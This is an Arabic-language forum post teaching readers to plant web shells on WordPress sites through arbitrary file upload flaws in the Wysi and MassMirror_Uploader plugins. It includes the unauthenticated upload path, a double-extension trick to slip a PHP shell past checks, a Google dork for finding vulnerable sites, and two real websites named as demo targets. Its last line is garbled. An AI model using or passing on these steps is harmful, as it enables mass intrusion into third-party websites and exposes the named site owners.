بسم الله الرحمن الرحيم
بعد الموضوع "ثغرة تحميل في الوورد بريس ..قررت الاستجابة لمطالب الشرح..
ثغرة التحميل عشوائية عن طريق القوقل وآلاااف المواقع مصابة
اخذنا موقع مصاب الى رح يكون مثل ما في الصورة
نحط الشل وننتظر الموفقة
عند الموافقة علي التحميل
نحط اسم شل في الموقع ومبروك
ثغرات الووردبرس
كود PHP:
# Exploit Title: WordPress Wysi Plugin Arbitrary File upload Vulnerability
# Date: June, 14th 2011 [GMT +7]
# Author: Net.Edit0r
# Software Link: http://wordpress.org/extend/plugins/real-wysiwyg/
# Version : 0.0.2
# Tested on: ubuntu 11.04
# CVE : -
-----------------------------------------------------------------------------------------
WordPress Wysi Plugin Arbitrary File upload Vulnerability => RFU Vulnerability
-----------------------------------------------------------------------------------------
Author : Net.Edit0r
Date : June, 14th 2011 [GMT +7]
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~
in this file you can upload image files without any authentication.
for uploading shell you must change extension of file to
.php.gif(shell.php.gif)
or any other image extension.successful attack depend to host and
server config.
PoC/Exploit:
~~~~~~~~~~
~ [PoC] ~: /wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php
~ [PoC] ~: Http://[victim]/path-to-wp/wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php
[ Upload To : /wp-content/content/shell.php.jpg ]
Dork:
~~~~~
Google : inurl:"/filemanager/InsertFile/insert_file.php"
Demo URL:
~~~~~~~~~
- http://www.kalamu.com/bol/wp-content/plugins/filemanager/InsertFile/insert_file.php
- http://www.afofoundation.org/wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php
Timeline:
~~~~~~~~~
- 13 - 06 - 2011 bug found.
- 13 - 06 - 2011 vendor contacted, but no response.
- 14 - 06 - 2011 Advisories release.
Contact:
~~~~~~~~~
كود PHP:
########################################################################
# Vendor: http://www.wordpress.com/
# Author : indoushka
# Inj3ct0r Team http://77.120.101.55/
# Thanks to : Dz-Ghost Team
# Contact : http://www.appinsecurity.com
# Tested on : windows SP2 Francais V.(Pnx2 2.0)
########################################################################
# Exploit By indoushka
-------------
plugins
http://127.0.0.1/wordpress/wp-content/plugins/MassMirror_Uploader/Base/
http://127.0.0.1/wordpress/wp-content/plugins/MassMirror_Uploader/Base/uploaded_files/
avp jpldg hgag ugn hg,v]fvds fhw,v